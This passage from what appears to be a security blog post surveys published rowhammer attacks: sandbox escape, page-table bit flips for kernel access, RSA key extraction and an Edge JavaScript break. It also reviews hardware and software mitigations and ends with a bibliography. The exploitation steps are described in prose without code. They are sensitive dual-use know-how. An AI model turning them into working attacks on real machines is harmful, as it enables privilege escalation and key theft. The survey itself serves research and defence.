Bit flips in these instructions often cause other registers to be used and thus bypass the sandbox enforcing limits on relative jumps. By spraying code like the above then row hammer, check for usable bit flips and finally use one of these relative jumps to execute a not validated code path and thus exit the sandbox. Not validated code path can be entered through code reuse style gadgets.

The second and more serious privilege escalation attack demonstrated by [2] was from ring 3 user privileges to ring 0. Since adjacent physical addresses has a tendency to be used at the same time, CPU vendors map adjacent physical addresses to different parts of RAM as this offers the possibility of memory request being handled by DRAM in parallel. This has the effect that banks are often shared between different software across trust boundaries. This allows an attacker to flip bits in page table entries (PTE). PTE’s is central in the security on x86 and controls access writes to memory as well as mapping between virtual and physical addresses. By repeatedly memory mapping a file many new PTE’s are sprayed and the attack has a good chance of hitting by random using row hammer. The attacker hopes that a bit flips so that a PTE with write privileges maps to a new physical address where another PTE is located. By strategically modifying this second PTE the attacker has read & write access to the entire memory.

[18] Bhattacharya & Mukhopadhyay. Used to Row Hammer to extract a private RSA 1024 bit key. Their attack used a combination of PAGEMAP, a cache side channel attack (prime+probe) and a row buffer side channel attack to find the approximate location in physical memory of the private key. Once located row hammer is used to introduce a fault in the private key, and fault analysis is then used to derive the real private key. This make the attack somewhat unique in that it’s the only attack so far that does not rely on any kind of spraying.

[19] Bosman et. Al. Breaks the Microsoft Edge’s javascript sandbox . First they use two novel dedublication attacks to gain knowledge about the address space layout. This allows them to create a valid looking, but counterfeit java object in a double array. They then find bit flips by allocating a large array and using single sided row hammering. The method used is similar to [8] but they also notice and exploit the fact that pages 128k appart are likely to be cache set congruent. Once they know where the bit flips are they can place a valid object at this address, that is so crafted that the bit flip will change it to a reference to the counterfeit object. Once this is set the row hammering is repeated and they now have a reference for the counterfeit object that can be used by compiled javascript. Further the object can be edited through the double array in which it was created and this allows arbitrary memory read and write.

[20] Xiao et al. The content of this paper is unknown to me, yet the title suggests that cross-VM and a new kind of privilege escalation is possible with row hammer.

It is likely that row hammer can be exploited in other ways too.

Row hammer mitigation

Most hardware mitigations suggest focuses on refreshing victim rows thus leaving less time for row hammer to do its work. Unfortunately, during the refresh ram is unable to respond to requests from the CPU and thus it comes at a performance penalty.

The simplest suggestion is increase the refresh rate for all ram. Much hardware support this already for high-temperatures. Usually the refresh rate is doubled, however to perfectly rule out row one would need to increase the refresh rate more than 7 fold [1]. Which in term is a steep performance penalty and a power consumption issue.

TTR [17] is a method that keeps track of used rows and cause targeted refresh of neighbors to minimize the penalty. The method needs to be supported in both CPU as well as RAM modules. MAC also known as maximum activation count keeps tracks of how many times a given row was activated. pTTR does this only statistically and thus cheaper to build into hardware. PARA [1] is another suggested hardware mitigation to statistically refresh victim rows. ARMOR [16] a solution that keep tracks of row activation in the memory interface.

It has been suggested that ECC ram can be used as a mitigation. Unfortunately, ECC ram will not to detect or correct bit flips in all instances where there are multiple bit flips in a row. Thus this leaves room for an attack to be successful even with ECC ram. Also ECC ram may cause the attacked system to reset, turning row hammer into a Denial of Service attack. [4] Suggests this problem persists in real life experiments. Keeping track of ECC errors may however serve as an indication that a system was under attack and could be used to trigger other counter measures.

Nishat Herath and I suggested using the LLC miss performance counter to detect row hammering here [11] Fogh & Nishat. LLC Misses are rare in real usage, but abundant in row hammering scenarios. [12] Gruss et al. ,[13] Payer refined the method respectively with correcting for generally activity in the memory subsystem. The methods are likely to present false positives in some cases and [11] and [13] therefore suggested only slowing down offenders to prevent bit flips. [14] Aweke et al. presented a method that first detected row hammering as above, then verified using PEBS performance monitoring, which has the advantage of delivering an address related to a cache miss and thus grants the ability to selectively read neighbor rows and thus doing targeted row refresh in a software implementation. [15] Fogh speculated that this method could be effectively bypassed by an attacker.

Litterature

[1] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361–372, June 2014.

[2] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015.

[3] Mark Seaborn and Thomas Dullien. “Exploiting the DRAM rowhammer bug to gain kernel privileges”. https://www.blackhat.com/docs/us-15/materials/us-15-Seaborn-Exploiting-The-DRAM-Rowhammer-Bug-To-Gain-Kernel-Privileges.pdf

[4] Mark Lanteigne. “How Rowhammer Could Be Used to Exploit Weaknesses in Computer Hardware

“. Third I/O. http://www.thirdio.com/rowhammer.pdf

[5] Mark Seaborn.” How physical addresses map to rows and banks in DRAM”;

[6] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, Stefan Mangard: „Reverse Engineering Intel DRAM Addressing and Exploitation“

[7] Zelalem Birhanu Aweke, “Rowhammer without CLFLUSH,” https://groups.google.com/forum/#!topic/rowhammer-discuss/ojgTgLr4q M, May 2015, retrieved on July 16, 2015.

[8] Daniel Gruss, Clémentine Maurice, Stefan Mangard: “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”

[9] Rui Qiao, Mark Seaborn: “A New Approach for Rowhammer Attacks”.http://seclab.cs.sunysb.edu/seclab/pubs/host16.pdf

[10] Anders Fogh: “Row hammer, java script and MESI”http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

[11] Anders Fogh, Nishat Herath. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[12] Daniel Gruss, Clémentine Maurice, Klaus Wagner, Stefan Mangard: “Flush+Flush: A Fast and Stealthy Cache Attack”

[13] Mathias Payer: “HexPADS: a platform to detect “stealth” attacks“. https://nebelwelt.net/publications/files/16ESSoS.pdf

[14] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”

[15] Anders Fogh: “Anvil & Next generation row hammer attacks”. http://dreamsofastone.blogspot.de/2016/03/anvil-next-generation-row-hammer-attacks.html

[16] http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html

[17] http://www.jedec.org/standards-documents/results/jesd209-4

[18] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

[19] Erik Bosman, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida “Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector”

[20] Yuan Xiao, Xiaokuan Zhang, Yinqian Zhang, and Mircea-Radu Teodorescu:”One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation”. To be published

[21] Mark Lateigne: “A Tale of Two Hammers. A Brief Rowhammer Analysis of AMD vs. Intel”. http://www.thirdio.com/rowhammera1.pdf